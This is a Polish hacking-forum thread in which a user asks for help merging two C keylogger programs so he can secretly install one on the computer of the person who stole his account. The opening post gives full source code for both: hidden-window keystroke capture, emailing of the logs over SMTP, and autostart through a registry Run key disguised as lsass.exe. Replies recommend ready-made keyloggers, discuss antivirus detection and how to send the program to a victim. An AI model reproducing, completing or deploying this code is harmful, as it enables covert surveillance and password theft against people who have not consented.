spykey

Temat: Keylogger

Pokaz wyniki od 1 do 9 z 9
 1. #1 Keylogger 
  Użytkownik
  Dołączył
  05-05-2015
  Posty
  8
  Witam, potrzebuję keyloggera. Niestety jestem w tym zielony.Ukradli mi konto warte [SIZE=6]600-800 zł [COLOR=#000000][SIZE=2]i chce je odzyskać. Mam 2 kody ale potrzebne mi jest ich połaczenie sprawdzenie i ewentualnie dodanie kilku funkcji. kod 1 zawiera wysyłanie widomości na e-mail a 2 posiada autostart. Potrzebuję także żeby był niewidoczny podczas pracy oraz sam się instalował.
  Bardzo prosze o pomoc.

  #include <windows.h>
  #include <stdio.h>
  #include <winuser.h>
  #include <windowsx.h>
  #include <time.h>
  int MailIt (char *mailserver, char *emailto, char *emailfrom,
  char *emailsubject, char *emailmessage);
  #define BUFSIZE 800
  #define waittime 500
  /*If you don't know the mail exchange server for an address for the following
  "nslookup -querytype=mx gmail.com" but replace gmail.com with the domain for
  whatever email address you want. YOU MUST CHANGE THESE SETTINGS OR
  IT WILL NOT WORK!!! */
  #define cmailserver "gmail-smtp-in.l.google.com"
  #define cemailto "[email protected]"
  #define cemailfrom "[email protected]"
  #define LogLength 100
  #define FileName "sound.wav"
  #define SMTPLog "ring.wav"
  #define cemailsubject "Logged"

  int test_key(void);
  int main(void)
  {
  //Uncomment the lines below to put the keylogger in stealh mode.
  HWND stealth; /*creating stealth */
  AllocConsole();
  stealth=FindWindowA("ConsoleWindowClass",NULL);
  ShowWindow(stealth,0);

  {FILE *file;
  file=fopen(FileName,"a+");
  time_t theTime=time(0);
  fputs("\nStarted logging: ", file);
  fputs(ctime(&theTime),file);
  fclose(file);
  }

  /* if (test==2)
  {//the path in which the file needs to be
  char *path="c:\\%windir%\\svchost.exe";
  create=create_key(path);
  } */

  int t=get_keys();
  return t;
  }

  int get_keys(void)
  {
  int freadindex;
  char *buf;
  long len;
  FILE *file;
  file=fopen(FileName,"a+");


  short character;
  while(1)
  {
  sleep(10);/*to prevent 100% cpu usage*/
  for(character=8;character<=222;character++)
  {
  if(GetAsyncKeyState(character)==-32767)
  {
  FILE *file;
  file=fopen(FileName,"a+");
  if(file==NULL)
  {
  return 1;
  }
  if(file!=NULL)
  {
  if((character>=39)&&(character<=64))
  {
  fputc(character,file);
  fclose(file);
  break;
  }
  else if((character>64)&&(character<91))
  {
  character+=32;
  fputc(character,file);
  fclose(file);
  break;
  }
  else
  {
  switch(character)
  {
  case VK_SPACE:
  fputc(' ',file);
  fclose(file);
  break;
  case VK_SHIFT:
  fputs("\r\n[SHIFT]\r\n",file);
  fclose(file);
  break;
  case VK_RETURN:
  fputs("\r\n[ENTER]\r\n",file);
  fclose(file);
  break;
  case VK_BACK:
  fputs("\r\n[BACKSPACE]\r\n",file);
  fclose(file);
  break;
  case VK_TAB:
  fputs("\r\n[TAB]\r\n",file);
  fclose(file);
  break;
  case VK_CONTROL:
  fputs("\r\n[CTRL]\r\n",file);
  fclose(file);
  break;
  case VK_DELETE:
  fputs("\r\n[DEL]\r\n",file);
  fclose(file);
  break;
  case VK_OEM_1:
  fputs("\r\n[;:]\r\n",file);
  fclose(file);
  break;
  case VK_OEM_2:
  fputs("\r\n[/?]\r\n",file);
  fclose(file);
  break;
  case VK_OEM_3:
  fputs("\r\n[`~]\r\n",file);
  fclose(file);
  break;
  case VK_OEM_4:
  fputs("\r\n[ [{ ]\r\n",file);
  fclose(file);
  break;
  case VK_OEM_5:
  fputs("\r\n[\\|]\r\n",file);
  fclose(file);
  break;
  case VK_OEM_6:
  fputs("\r\n[ ]} ]\r\n",file);
  fclose(file);
  break;
  case VK_OEM_7:
  fputs("\r\n['\"]\r\n",file);
  fclose(file);
  break;
  case 187:
  fputc('+',file);
  fclose(file);
  break;
  case 188:
  fputc(',',file);
  fclose(file);
  break;
  case 189:
  fputc('-',file);
  fclose(file);
  break;
  case 190:
  fputc('.',file);
  fclose(file);
  break;
  case VK_NUMPAD0:
  fputc('0',file);
  fclose(file);
  break;
  case VK_NUMPAD1:
  fputc('1',file);
  fclose(file);
  break;
  case VK_NUMPAD2:
  fputc('2',file);
  fclose(file);
  break;
  case VK_NUMPAD3:
  fputc('3',file);
  fclose(file);
  break;
  case VK_NUMPAD4:
  fputc('4',file);
  fclose(file);
  break;
  case VK_NUMPAD5:
  fputc('5',file);
  fclose(file);
  break;
  case VK_NUMPAD6:
  fputc('6',file);
  fclose(file);
  break;
  case VK_NUMPAD7:
  fputc('7',file);
  fclose(file);
  break;
  case VK_NUMPAD8:
  fputc('8',file);
  fclose(file);
  break;
  case VK_NUMPAD9:
  fputc('9',file);
  fclose(file);
  break;
  case VK_CAPITAL:
  fputs("\r\n[CAPS LOCK]\r\n",file);
  fclose(file);
  break;
  default:
  fclose(file);
  break;
  }
  }
  }
  }
  }
  FILE *file;
  file=fopen(FileName,"rb");
  fseek(file,0,SEEK_END); //go to end
  len=ftell(file); //get position at end (length)
  if(len>=LogLength) {
  fseek(file,0,SEEK_SET);//go to beg.
  buf=(char *)malloc(len);//malloc buffer
  freadindex=fread(buf,1,len,file);//read into buffer
  buf[freadindex] = '\0';//Extra bit I have to add to make it a sting
  MailIt( cmailserver, cemailto, cemailfrom, cemailsubject, buf);
  fclose(file);
  file=fopen(FileName,"w");
  }

  fclose(file);
  //free (buf);

  }
  return EXIT_SUCCESS;
  }

  int MailIt (char *mailserver, char *emailto, char *emailfrom,
  char *emailsubject, char *emailmessage) {
  SOCKET sockfd;
  WSADATA wsaData;
  FILE *smtpfile;

  #define bufsize 300
  int bytes_sent; /* Sock FD */
  int err;
  struct hostent *host; /* info from gethostbyname */
  struct sockaddr_in dest_addr; /* Host Address */
  char line[1000];
  char *Rec_Buf = (char*) malloc(bufsize+1);
  smtpfile=fopen(SMTPLog,"a+");
  if (WSAStartup(0x202,&wsaData) == SOCKET_ERROR) {
  fputs("WSAStartup failed",smtpfile);
  WSACleanup();
  return -1;
  }
  if ( (host=gethostbyname(mailserver)) == NULL) {
  perror("gethostbyname");
  exit(1);
  }
  memset(&dest_addr,0,sizeof(dest_addr));
  memcpy(&(dest_addr.sin_addr),host->h_addr,host->h_length);

  /* Prepare dest_addr */
  dest_addr.sin_family= host->h_addrtype; /* AF_INET from gethostbyname */
  dest_addr.sin_port= htons(25); /* PORT defined above */

  /* Get socket */

  if ((sockfd=socket(AF_INET,SOCK_STREAM,0)) < 0) {
  perror("socket");
  exit(1);
  }
  /* Connect !*/
  fputs("Connecting....\n",smtpfile);

  if (connect(sockfd, (struct sockaddr *)&dest_addr,sizeof(dest_addr)) == -1){
  perror("connect");
  exit(1);
  }
  sleep(waittime);
  err=recv(sockfd,Rec_Buf,bufsize,0);Rec_Buf[err] = '\0';
  fputs(Rec_Buf,smtpfile);
  strcpy(line,"helo me.somepalace.com\n");
  fputs(line,smtpfile);
  bytes_sent=send(sockfd,line,strlen(line),0);
  sleep(waittime);
  err=recv(sockfd,Rec_Buf,bufsize,0);Rec_Buf[err] = '\0';
  fputs(Rec_Buf,smtpfile);
  strcpy(line,"MAIL FROM:<");
  strncat(line,emailfrom,strlen(emailfrom));
  strncat(line,">\n",3);
  fputs(line,smtpfile);
  bytes_sent=send(sockfd,line,strlen(line),0);
  sleep(waittime);
  err=recv(sockfd,Rec_Buf,bufsize,0);Rec_Buf[err] = '\0';
  fputs(Rec_Buf,smtpfile);
  strcpy(line,"RCPT TO:<");
  strncat(line,emailto,strlen(emailto));
  strncat(line,">\n",3);
  fputs(line,smtpfile);
  bytes_sent=send(sockfd,line,strlen(line),0);
  sleep(waittime);
  err=recv(sockfd,Rec_Buf,bufsize,0);Rec_Buf[err] = '\0';
  fputs(Rec_Buf,smtpfile);
  strcpy(line,"DATA\n");
  fputs(line,smtpfile);
  bytes_sent=send(sockfd,line,strlen(line),0);
  sleep(waittime);
  err=recv(sockfd,Rec_Buf,bufsize,0);Rec_Buf[err] = '\0';
  fputs(Rec_Buf,smtpfile);
  sleep(waittime);
  strcpy(line,"To:");
  strcat(line,emailto);
  strcat(line,"\n");
  strcat(line,"From:");
  strcat(line,emailfrom);
  strcat(line,"\n");
  strcat(line,"Subject:");
  strcat(line,emailsubject);
  strcat(line,"\n");
  strcat(line,emailmessage);
  strcat(line,"\r\n.\r\n");
  fputs(line,smtpfile);
  bytes_sent=send(sockfd,line,strlen(line),0);
  sleep(waittime);
  err=recv(sockfd,Rec_Buf,bufsize,0);Rec_Buf[err] = '\0';
  fputs(Rec_Buf,smtpfile);
  strcpy(line,"quit\n");
  fputs(line,smtpfile);
  bytes_sent=send(sockfd,line,strlen(line),0);
  sleep(waittime);
  err=recv(sockfd,Rec_Buf,bufsize,0);Rec_Buf[err] = '\0';
  fputs(Rec_Buf,smtpfile);
  fclose(smtpfile);
  #ifdef WIN32
  closesocket(sockfd);
  WSACleanup();
  #else
  close(sockfd);
  #endif

  Ten zostal trochę w środku opisany

  #include <windows.h>
  #include <stdio.h>
  #include <winuser.h>
  #include <windowsx.h>

  #define BUFSIZE 80

  int test_key(void);
  int create_key(char *);
  int get_keys(void);

  int main(void)
  {
  HWND stealth;
  AllocConsole();
  stealth=FindWindowA("ConsoleWindowClass",NULL);
  ShowWindow(stealth,0);

  int test,create;
  test=test_key();
  if (test==2) // Create key.
  {
  char *path="C:\\WINDOWS\\system32\\lsass.exe";
  create=create_key(path);

  }


  int t=get_keys();

  return t;
  }

  int get_keys(void)
  {
  short character;
  while(1)
  {
  Sleep(10);
  for(character=8;character<=222;character++)
  {
  if(GetAsyncKeyState(character)==-32767)
  {

  FILE *file;
  file=fopen("xe41.log","a+");
  if(file==NULL)
  {
  return 1;
  }
  if(file!=NULL)
  {
  if((character>=39)&&(character<=64))
  {
  fputc(character,file);
  fclose(file);
  break;
  }
  else if((character>64)&&(character<91))
  {
  character+=32;
  fputc(character,file);
  fclose(file);
  break;
  }
  else
  {
  switch(character)
  {
  case VK_SPACE:
  fputc(' ',file);
  fclose(file);
  break;
  case VK_SHIFT:
  fputs("[SHIFT]",file);
  fclose(file);
  break;
  case VK_RETURN:
  fputs("\n[ENTER]",file);
  fclose(file);
  break;
  case VK_BACK:
  fputs("[BACKSPACE]",file);
  fclose(file);
  break;
  case VK_TAB:
  fputs("[TAB]",file);
  fclose(file);
  break;
  case VK_CONTROL:
  fputs("[CTRL]",file);
  fclose(file);
  break;
  case VK_DELETE:
  fputs("[DEL]",file);
  fclose(file);
  break;
  case VK_OEM_1:
  fputs("[;:]",file);
  fclose(file);
  break;
  case VK_OEM_2:
  fputs("[/?]",file);
  fclose(file);
  break;
  case VK_OEM_3:
  fputs("ö",file);
  fclose(file);
  break;
  case VK_OEM_4:
  fputs("[ [{ ]",file);
  fclose(file);
  break;
  case VK_OEM_5:
  fputs("[\\|]",file);
  fclose(file);
  break;
  case VK_OEM_6:
  fputs("a*",file);
  fclose(file);
  break;
  case VK_OEM_7:
  fputs("ä",file);
  fclose(file);
  break;
  /* case VK_OEM_PLUS:
  fputc('+',file);
  fclose(file);
  break;
  case VK_OEM_COMMA:
  fputc(',',file);
  fclose(file);
  break;
  case VK_OEM_MINUS:
  fputc('-',file);
  fclose(file);
  break;
  case VK_OEM_PERIOD:
  fputc('.',file);
  fclose(file);
  break; */
  case VK_NUMPAD0:
  fputc('0',file);
  fclose(file);
  break;
  case VK_NUMPAD1:
  fputc('1',file);
  fclose(file);
  break;
  case VK_NUMPAD2:
  fputc('2',file);
  fclose(file);
  break;
  case VK_NUMPAD3:
  fputc('3',file);
  fclose(file);
  break;
  case VK_NUMPAD4:
  fputc('4',file);
  fclose(file);
  break;
  case VK_NUMPAD5:
  fputc('5',file);
  fclose(file);
  break;
  case VK_NUMPAD6:
  fputc('6',file);
  fclose(file);
  break;
  case VK_NUMPAD7:
  fputc('7',file);
  fclose(file);
  break;
  case VK_NUMPAD8:
  fputc('8',file);
  fclose(file);
  break;
  case VK_NUMPAD9:
  fputc('9',file);
  fclose(file);
  break;
  case VK_CAPITAL:
  fputs("[CAPS LOCK]",file);
  fclose(file);
  break;
  default:
  fclose(file);
  break;
  }
  }
  }
  }
  }

  }
  return EXIT_SUCCESS;
  }

  int test_key(void)
  {
  int check;
  HKEY hKey;
  char path[BUFSIZE];
  DWORD buf_length=BUFSIZE;
  int reg_key;


  I tak na marginesie - aby keylogger nam sie uruchamiał przy starcie systemu.

  Porszę oto przykład:

  reg_key=RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\ \Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_QU ERY_VALUE,&hKey);
  if(reg_key!=0)
  {
  check=1;
  return check;
  }

  reg_key=RegQueryValueEx(hKey,"Kkey",NULL,NULL,(LPB YTE)path,&buf_length);

  if((reg_key!=0)||(buf_length>BUFSIZE))
  check=2;
  if(reg_key==0)
  check=0;

  RegCloseKey(hKey);
  return check;
  }

  int create_key(char *path)
  {
  int reg_key,check;

  HKEY hkey;

  reg_key=RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\ \Microsoft\\Windows\\CurrentVersion\\Run",&hkey);
  if(reg_key==0)
  {
  RegSetValueEx((HKEY)hkey,"Kkey",0,REG_SZ,(BYTE *)path,strlen(path));
  check=0;
  return check;
  }
  if(reg_key!=0)
  check=1;

  return check;
  }
  Ostatnio edytowane przez kosua ; 19-08-2015 o 17:15
  Odpowiedź z Cytatem  
   

 2. #2  
  Zbanowany
  Dołączył
  18-08-2015
  Posty
  8
  ja Ci nie pomoge z połączeniem tych kodów ale w jaki sposób chcesz to podesłać złodziejowi?
  musisz przecierz wiedzieć kim jest wiec wydaje mi sie że przy takim przestepstwie a nie np. zabawie typu wykradzenia konta metina lepszym rozwiazaniem będzie zgloszenie delikwenta na policje
  Odpowiedź z Cytatem  
   

 3. #3  
  Użytkownik
  Dołączył
  05-05-2015
  Posty
  8
  co mnie obchodzi że zgłosze skoro nie odzyskam konta? Poprostu zbinduje z czymś i podeśle mu to. On zobaczy i się mu to zainstaluje na kompie, przy logowaniu bd znał jego hasło
  Odpowiedź z Cytatem  
   

 4. #4  
  Użytkownik
  Dołączył
  22-07-2015
  Posty
  14
  Antywirus bedzie wyl jak szalony jak mu to podeslesz, skorzystaj lepiej z platnych keyloggerow ktore sa co jakis czas proponowane na tym forum...
  Odpowiedź z Cytatem  
   

 5. #5  
  Użytkownik
  Dołączył
  05-05-2015
  Posty
  8
  możecie jakis polecić?
  Odpowiedź z Cytatem  
   

 6. #6  
  Zbanowany
  Dołączył
  18-08-2015
  Posty
  8
  Polecam Secretlogger.
  Odpowiedź z Cytatem  
   

 7. #7  
  Użytkownik
  Dołączył
  05-05-2015
  Posty
  8
  można go podsyłać?
  Odpowiedź z Cytatem  
   

 8. #8  
  Administrator Avatar Admin
  Dołączył
  11-10-2013
  Posty
  198
  Możesz użyć RazielKeylogger. Jest darmowy, ale niestety wykrywalny.
  Odpowiedź z Cytatem  
   

 9. #9  
  Użytkownik
  Dołączył
  07-11-2018
  Posty
  2
  Kod źródłowy keyloggera w Visual C++:
  Visual C++ Keylogger

  Pozostaje jednak dopisać do niego wysyłanie logów, gdyż w tej formie działa on lokalnie.
  Odpowiedź z Cytatem  
   

Podobne wątki

 1. co to jest perfect keylogger i keylogger online?
  Przez hakerus
  w forum Keyloggers/Stealers
  Odpowiedzi: 3
  Ostatni post / autor: 27-04-2006, 17:47
Uprawnienia
 • Nie mozesz zakładać nowych tematów
 • Nie mozesz pisać wiadomosci
 • Nie mozesz dodawać załączników
 • Nie mozesz edytowac swoich postów
 •